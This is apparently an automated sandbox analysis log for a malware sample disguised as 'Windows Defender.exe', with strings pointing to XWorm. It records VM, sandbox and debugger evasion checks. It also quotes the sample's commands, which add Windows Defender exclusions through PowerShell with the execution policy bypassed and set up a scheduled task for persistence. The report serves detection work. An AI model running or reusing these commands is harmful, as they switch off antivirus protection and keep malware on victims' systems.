                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Check if machine is in data center or colocation facility
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\Windows Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\Windows Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\Windows Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: Windows Defender.exe, Windows Defender.exe.0.drBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Windows Defender.exeMemory allocated: 1420000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeMemory allocated: 1AE90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMemory allocated: 1350000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMemory allocated: 1AE50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMemory allocated: 11F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMemory allocated: 1AF50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMemory allocated: CB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMemory allocated: 1A730000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMemory allocated: 950000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMemory allocated: 1A700000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Windows Defender.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Windows Defender.exeWindow / User API: threadDelayed 7284Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeWindow / User API: threadDelayed 2540Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5962Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3794Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8241Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1395Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7453Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2071Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7513
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2090
                      Source: C:\Users\user\Desktop\Windows Defender.exe TID: 1944Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6244Thread sleep count: 8241 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136Thread sleep count: 1395 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664Thread sleep count: 7453 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4372Thread sleep count: 2071 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep count: 7513 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612Thread sleep count: 2090 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6032Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe TID: 5272Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe TID: 3780Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe TID: 6348Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe TID: 7004Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Windows Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Windows Defender.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: Windows Defender.exe.0.drBinary or memory string: vmware
                      Source: Windows Defender.exe, 00000000.00000002.3491418383.000000001BCE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR'
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\Desktop\Windows Defender.exeCode function: 0_2_00007FFD3469764A CheckRemoteDebuggerPresent,0_2_00007FFD3469764A
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Windows Defender.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"Jump to behavior
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                      Source: C:\Users\user\Desktop\Windows Defender.exeQueries volume information: C:\Users\user\Desktop\Windows Defender.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
